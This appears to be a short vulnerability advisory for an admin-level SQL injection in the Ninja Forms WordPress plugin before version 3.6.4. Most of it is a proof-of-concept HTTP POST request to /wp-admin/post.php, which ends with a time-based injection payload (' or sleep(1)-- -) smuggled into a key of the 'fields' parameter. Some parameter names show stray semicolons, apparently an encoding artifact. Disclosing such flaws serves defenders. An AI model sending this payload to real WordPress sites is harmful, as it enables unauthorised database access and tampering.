Ninja Forms < 3.6.4 - Admin+ SQL Injection

The plugin does not escape keys of the fields POST parameter, which could allow high privilege users to perform SQL injections attacks

PoC

POST /wp-admin/post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 972 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache _wpnonce=b71ca03531&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D106%26action%3Dedit&user;_ID=1&action;=editpost&originalaction;=editpost&post;_author=1&post;_type=nf_sub&original;_post_status=publish&referredby;=http%3A%2F%2F192.168.223.130%2Fwp-admin%2Fedit.php%3Fpost_status%3Dall%26post_type%3Dnf_sub%26form_id%3D2&_wp_original_http_referer=http%3A%2F%2F192.168.223.130%2Fwp-admin%2Fedit.php%3Fpost_status%3Dall%26post_type%3Dnf_sub%26form_id%3D2&post;_ID=106&meta-box-order-nonce;=0a34e97291&closedpostboxesnonce;=88cbb362ee&hidden;_post_status=publish&post;_status=publish&hidden;_post_password=&hidden;_post_visibility=public&visibility;=public&post;_password=&mm;=10&jj;=20&aa;=2021&hh;=15&mn;=58&ss;=47&hidden;_mm=10&cur;_mm=10&hidden;_jj=20&cur;_jj=20&hidden;_aa=2021&cur;_aa=2021&hidden;_hh=15&cur;_hh=16&hidden;_mn=58&cur;_mn=47&original;_publish=Update&nf;_edit_sub=1&save;=Update&post;_name=106&fields;%5B5%5D=0&fields;%5B5%5D=on&fields;%5B6%5D=0&fields;%5B6%5D=on&fields;[’ or sleep(1)-- -]=xxx